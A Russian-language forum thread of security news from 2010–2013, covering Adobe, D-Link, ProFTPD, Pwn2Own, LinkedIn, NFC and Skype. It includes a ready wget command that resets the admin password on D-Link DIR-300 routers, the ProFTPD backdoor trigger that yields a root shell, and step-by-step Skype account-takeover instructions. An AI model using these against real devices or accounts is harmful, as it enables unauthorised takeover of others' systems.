Рейтинг@Mail.ru

Новости безопасности

Программы, описания, советы и т.п.

Модератор: Frank

Re: Новости безопасности

Сообщение Frank » 31 окт 2010, 11:26

И флеш тоже
В Adobe Flash Player и Adobe Reader найдена критическая уязвимость, проявляющаяся для всех поддерживаемых платформ (Windows, MacOS X, Linux, Android и Solaris) и позволяющая злоумышленнику выполнить свой код в системе при открытии специально оформленного SWF или PDF-файла. Исправление пока не выпущено и ожидается только через две недели, несмотря на то, что имеются сведения о распространении в сети вредоносного ПО, эксплуатирующего данную уязвимость в Adobe Reader и Acrobat 9.x.
В качестве временной меры защиты, рекомендуется удалить библиотеку "libauthplay.so.0.0.0" из директории "Reader9/Reader/intellinux/lib/" или "Reader9/Reader/intelsolaris/lib/" (в Windows: "Program Files\Adobe\Acrobat 9.0\Acrobat\authplay.dll").

впрочем, абоб ридер в линуксе практически никто не использует
Изображение
Аватара пользователя
Frank
Гуру
Гуру
 
Сообщения: 4499
Зарегистрирован: 11 фев 2007, 22:20
Откуда: с Глинки
Пол: Мужской
Провайдер: Амрон

Re: Новости безопасности

Сообщение Frank » 16 ноя 2010, 14:54

В безпроводных роутерах D-Link DIR-300 (и, возможно, других моделях с таким же (уязвимым) файлом админки) обнаружена дырища: tools_admin.php позволяет сменить имя администратора, пароль и другие переменные безо всякой предварительной аутентификации просто ручной посылкой специального http post запроса. Проблема есть как минимум в прошивках версий 2.01B1, 1.04, 1.05.
Готовый "эксплойт":
Код: Выделить всё
wget http://айпи:порт/tools_admin.php --post-data="ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=12345"

Защититься можно только отключив доступ в админку со всех интерфейсов, на которых могут оказаться посторонние лица. Компания D-Link пока изображает страуса :)
Изображение
Аватара пользователя
Frank
Гуру
Гуру
 
Сообщения: 4499
Зарегистрирован: 11 фев 2007, 22:20
Откуда: с Глинки
Пол: Мужской
Провайдер: Амрон

Re: Новости безопасности

Сообщение Frank » 03 дек 2010, 00:15

Разработчики популярного FTP-сервера ProFTPD сообщили об обнаружении факта взлома основного сервера проекта и подмены архива с исходными текстами на вариант, содержащий вредоносный код. В результате атаки, c 28 ноября по 2 декабря с первичного FTP-сервера проекта и всех зеркал распространялся модифицированный злоумышленниками вариант архива ProFTPD 1.3.3c.

Всем пользователям, загрузившим код в указанный период времени, следует немедленно сверить контрольные суммы для загруженного архива и в случае их несовпадения установить корректную версию ProFTPD. Интегрированный в код сервера бэкдор позволял получить shell-доступ к системе с правами суперпользователя, после ввода FTP-команды "HELP ACIDBITCHEZ". При запуске, модифицированный сервер отправлял уведомление на определенный IP в Саудовской Аравии, давая знать о готовности принять команды злоумышленников.

Взлом сервера проекта был осуществлен в результате несвоевременного обновления ProFTPD, обслуживающего FTP-сервер проекта - в версии 1.3.3c была исправлена опасная уязвимость, важность которой была недооценена разработчиками. Бэкдор был внедрен 28 ноября в 20:00 (UTC), а обнаружен только вечером первого декабря.

Проверить уязвимость своего сервера, можно при помощи следующей последовательности команд:



Код: Выделить всё
   $ telnet 1.2.3.4 21
   Trying 1.2.3.4...
   Connected to 1.2.3.4
   Escape character is '^]'.
   220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [1.2.3.4]
   
   HELP ACIDBITCHEZ

   id ;

   uid=0(root) gid=0(root) groups=0(root),65534(nogroup)



Дополнение: появилась информация, что взлом мог быть совершен через новую (zero-day) уязвимость в модуле ProFTPD, используемом для аутентификации на SQL-сервере. Исправление для данной уязвимости пока не выпущено.
Изображение
Аватара пользователя
Frank
Гуру
Гуру
 
Сообщения: 4499
Зарегистрирован: 11 фев 2007, 22:20
Откуда: с Глинки
Пол: Мужской
Провайдер: Амрон

Re: Новости безопасности

Сообщение Pastor » 03 дек 2010, 04:02

Frank писал(а):впрочем, абоб ридер в линуксе практически никто не использует

А что лучше7
Аватара пользователя
Pastor
живу я тут
живу я тут
 
Сообщения: 287
Зарегистрирован: 26 июн 2009, 18:22
Пол: Мужской
Провайдер: Датгруп

Re: Новости безопасности

Сообщение Frank » 03 дек 2010, 09:55

evince или xpdf
Изображение
Аватара пользователя
Frank
Гуру
Гуру
 
Сообщения: 4499
Зарегистрирован: 11 фев 2007, 22:20
Откуда: с Глинки
Пол: Мужской
Провайдер: Амрон

Хакеры взломали Apple MacBook за пять секунд

Сообщение Граф О'Ман » 11 мар 2011, 14:27

Хакеры взломали Apple MacBook за пять секунд

На конференции по компьютерной безопасности CanSecWest в Ванкувере стартовал популярный конкурс хакеров Pwn2Own.
В первый же день эксперты успешно взломали браузеры Safari и Internet Explorer 8.
Попытки взлома Chrome не увенчались успехом, несмотря на то, что Google основал дополнительный приз в 20 тыс. долларов тому, кто может найти уязвимость в системе.
Ноутбук Apple MacBook с установленной версией Mac OS X 10.6 Snow Leopard специалисты из Франции сумели взломать за пять секунд - для доступа к компьютеру хакеры воспользовались неизвестной ранее уязвимостью браузера Safari.
Для взлома они воспользовались специально созданным сайтом. Через пять секунд с момента открытия этой веб-страницы в браузере хакерам удалось получить контроль над компьютером, запустить на нем калькулятор и сохранить на жестком диске компьютера файл.
Французам достался главный приз соревнования - 15 тысяч долларов. Также организаторы подарили им сломанный ноутбук.
Взлом Internet Explorer 8 был проведен Стефаном Февером из организации Harmony Security. В процессе атаки использовалась 32-разрядная версия браузера, запущенная на 64-разрядной Windows 7 Service Pack 1.
Повторив историю со взломом Safari, после открытия специально оформленной веб-страницы был организован запуск калькулятора и записанный файл на диске.
На разработку техники атаки Internet Explorer ушло 5-6 недель, а Safari - 2 недели работы группы экспертов VUPEN.
http://novosti-n.mk.ua/ukraine/read/?id=27060
И выть на небо хочется, а вокруг - такая тишина...
© Ю.Лоза
Аватара пользователя
Граф О'Ман
это имя знают все
это имя знают все
 
Сообщения: 1821
Зарегистрирован: 29 сен 2008, 22:23
Пол: Мужской
Провайдер: Амрон

Re: Хакеры взломали Apple MacBook за пять секунд

Сообщение Frank » 11 мар 2011, 20:02

Завершился второй день соревнования Pwn2own. Если на первом дне были продемонстрированы успешные атаки на систему через взлом браузеров Safari и Internet Explorer 8, то второй день оказался не таким ярким - успешно были взломаны только телефоны iPhone 4 и BlackBerry Torch 9800. Атаки на платформы Android и Windows Phone 7 не принесли результата. Что касается Firefox, то попытка по его взлому не удалась - конкурсант взял самоотвод, пояснив свой поступок нестабильностью работы созданного эксплоита. Завтра будут известны результаты третьего дня конкурса.
Изображение
Аватара пользователя
Frank
Гуру
Гуру
 
Сообщения: 4499
Зарегистрирован: 11 фев 2007, 22:20
Откуда: с Глинки
Пол: Мужской
Провайдер: Амрон

Re: Хакеры взломали Apple MacBook за пять секунд

Сообщение Master_Gambs » 12 мар 2011, 04:41

Граф О'Ман писал(а):В процессе атаки использовалась 32-разрядная версия браузера, запущенная на 64-разрядной Windows 7 Service Pack 1.

класс))))
Граф О'Ман писал(а):На разработку техники атаки Internet Explorer ушло 5-6 недель, а Safari - 2 недели работы группы экспертов VUPEN.
клятый маздай! нет чтобы сразу здохнуть, людЯм на радасть!

Frank писал(а): Атаки на платформы Android и Windows Phone 7 не принесли результата.
почему-то меня это не удивляет
Frank писал(а):Что касается Firefox, то попытка по его взлому не удалась - конкурсант взял самоотвод, пояснив свой поступок нестабильностью работы созданного эксплоита.
а может тупо перекупили? отмазка типа "нестабильно работающий экспоит" как то по детски звучит
Даже незаряженная палка - раз в год грабли
Аватара пользователя
Master_Gambs
пришелец
пришелец
 
Сообщения: 2
Зарегистрирован: 11 мар 2011, 20:47
Откуда: оттуда
Пол: Мужской
Провайдер: МТС

Re: Новости безопасности

Сообщение Frank » 05 июн 2012, 22:40

Ну вот и настал этот день. Вирусы с цифровой подписью майкрософта уже не за горами :D
Изображение
Аватара пользователя
Frank
Гуру
Гуру
 
Сообщения: 4499
Зарегистрирован: 11 фев 2007, 22:20
Откуда: с Глинки
Пол: Мужской
Провайдер: Амрон

Re: Новости безопасности

Сообщение delta » 05 июн 2012, 22:53

после такой информации начинаешь еще больше ценить Linux.

хотя, с другой сторны конечно ... ))))
image_4ea099a955bdb.jpg
Слабоумие и отвага!
Аватара пользователя
delta
это имя знают все
это имя знают все
 
Сообщения: 2347
Зарегистрирован: 06 апр 2007, 21:34
Пол: Мужской
Провайдер: Амрон

Re: Новости безопасности

Сообщение BarS » 05 июн 2012, 23:16

Вчера ХР-юшка обнаружила и установила вот это обновление. А вот статья про этот костылик в базе знаний мелкософта.
Всех убью, один останусь
Сироту всякий норовит обидеть
Аватара пользователя
BarS
Неприкасаемый
Неприкасаемый
 
Сообщения: 4478
Зарегистрирован: 11 фев 2007, 19:38
Откуда: 194.145.199.200
Пол: Мужской
Провайдер: Амрон

Re: Новости безопасности

Сообщение Frank » 07 июн 2012, 23:00

Неизвестный опубликовал на одном из ресурсов по совместному подбору паролей базу, в которой отражена информация об 6.5 млн паролей. В тот же день ещё один неизвестный опубликовал дополнительно 1.5 млн паролей. В опубликованных данных представлены SHA1-хэши паролей, не содержащие случайный salt, что упрощает словарный перебор. Примечательно, что подключившиеся к процессу подбора паролей энтузиасты за сутки смогли подобрать к хэшам более половины паролей.

Проанализировав представленные сведения, многие пользователи заметили, что в первой опубликованной базе (6.5 млн) содержатся хэши уникальных несловарных паролей, используемых только в социальной сети LinkedIn. В настоящее время администрация LinkedIn подтвердила факт того, что некоторые из записей действительно связаны с аккаунтами в LinkedIn, но причина утечки пока не ясна (в LinkedIn около 150 млн зарегистрированных пользователей). Все аккаунты в LinkedIn, для которых были опубликованы данные о паролях, заблокированы, а их владельцам отправлено уведомление со ссылкой для генерации нового пароля. Дополнительно отмечается, что во второй опубликованной базе (1.5 млн) были встречены хэши уникальных паролей, используемых в сервисе eHarmony.
Изображение
Аватара пользователя
Frank
Гуру
Гуру
 
Сообщения: 4499
Зарегистрирован: 11 фев 2007, 22:20
Откуда: с Глинки
Пол: Мужской
Провайдер: Амрон

Re: Новости безопасности

Сообщение Frank » 25 июн 2012, 13:55

Давно я ждал этого.
Томас Шкора (Thomas Skora), исследователь безопасности из Германии, представил приложение для платформы Android, способное читать содержимое бесконтактных кредитных карт. Для создания канала связи задействован стандартный беспроводной стек NFC (Near Field Communications), используемый для обмена данными в пределах малого радиуса действия. Код приложения опубликован на GitHub.

Приложение было успешно протестировано для сбора детальной информации с кредитных карт PayPass Mastercard, но также работает и с другими платёжными системами, такими как GeldKarte, пользующимися популярностью в Германии. В процессе демонстрации удалось считать номер карты, срок действия, информацию о транзакциях, идентификаторы торговых систем. По словам разработчика, создавая приложение он не преследовал злонамеренных целей, а лишь попытался продемонстрировать незащищённость бесконтактных платёжных систем и способность организации атаки при помощи обычного смартфона с поддержкой NFC.
Изображение
Аватара пользователя
Frank
Гуру
Гуру
 
Сообщения: 4499
Зарегистрирован: 11 фев 2007, 22:20
Откуда: с Глинки
Пол: Мужской
Провайдер: Амрон

Жесть как она есть

Сообщение Frank » 16 ноя 2012, 13:58

http://www.opennet.ru/opennews/art.shtml?num=35329
1. Злоумышленник заходит на сайт Skype и регистрирует новый Skype ID, указав e-mail жертвы.

2. Злоумышленник подключается к Skype с зарегистрированным Skype ID.

3. На странице для восстановления пароля на сайте Skype вводятся данные аккаунта жертвы.

4. Информация по сбросу и изменению пароля уходит не только на электронный ящик жертвы, но и во все открытые сессии Skype, в том числе данные по изменению пароля оказываются видимы в созданной злоумышленником сессии Skype.

Разработчики Skype были уведомлены о проблеме ещё весной этого года, но проблема с тех пор не была решена. Единственным пока решением остаётся смена e-mail на никому неизвестный. В заявлении компании Microsoft сказано "Мы получили данные о новой проблеме безопасности. В качестве предупредительный меры мы отключили функцию восстановления пароля на время, что позволит более детально исследовать этот вопрос. Мы приносим извинения за неудобства, но безопасность пользователей имеет для нас наивысший приоритет."
Изображение
Аватара пользователя
Frank
Гуру
Гуру
 
Сообщения: 4499
Зарегистрирован: 11 фев 2007, 22:20
Откуда: с Глинки
Пол: Мужской
Провайдер: Амрон

Re: Новости безопасности

Сообщение Frank » 23 июн 2013, 14:10

Как стало известно, компания Microsoft тайно сообщала спецслужбам данные об ещё не исправленных 0-day уязвимостях в Windows и Skype для их устранения до появления официальных обновлений и возможного проведения атак на компьютеры и организации слежки за другими государствами и различными компаниями.

http://www.opennet.ru/opennews/art.shtml?num=37217
Изображение
Аватара пользователя
Frank
Гуру
Гуру
 
Сообщения: 4499
Зарегистрирован: 11 фев 2007, 22:20
Откуда: с Глинки
Пол: Мужской
Провайдер: Амрон

Пред.След.

Вернуться в Софт

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1

cron